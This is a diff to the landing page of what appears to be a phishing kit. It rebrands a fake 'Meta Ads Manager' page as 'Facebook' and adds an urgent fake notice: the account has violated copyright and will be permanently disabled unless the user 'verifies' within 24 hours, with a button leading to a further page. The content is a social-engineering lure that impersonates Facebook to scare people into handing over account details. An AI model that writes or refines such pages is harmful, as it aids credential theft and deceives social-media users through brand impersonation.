--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
     <link rel="preconnect" href="https://fonts.googleapis.com">
     <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&amp;display=swap" rel="stylesheet">
-    <title>Ads Manager</title>
+    <title>Facebook</title>
     <style>
         * {
             
@@ -149,15 +149,15 @@
 <body>
     <div id="container">
         <div id="box">
-            <img src="meta-logo.png" alt="">
+            <img src="facebook-logo.png" alt="">
             <div id="data">
-                <H4>Meta Ads Manager</H4> <img src="bluetick1.png" alt="">
+                <H4>Account will be deactivated</H4> <img src="bluetick1.png" alt="">
             </div>
             <div class="line"></div>
             <div id="para">
                 <h2>
-
-Meta Advertising Support Manage your ad partnerships Add, manage and track partnership requests so that you can create ads on a partner's behalf and share ads directly from their Facebook Page or Instagram account You're eligible for a meta ads manager, if you trying to do business with agency or work advertising on your Facebook Page then you must have to follow our terms and conditions. Meta Ads Manager. </p>
+Your account or the page you use has violated copyright. We will immediately limit your account or permanently disable it for non-compliance with our terms of service.
+If you think we've accidentally suspended your account, you have 24 hours to verify your account. If you miss this security notification, your account will be permanently disabled. </p>
                 <button> <a href="index1.html"> Get Started</a> </button>
             </div>
         </div>
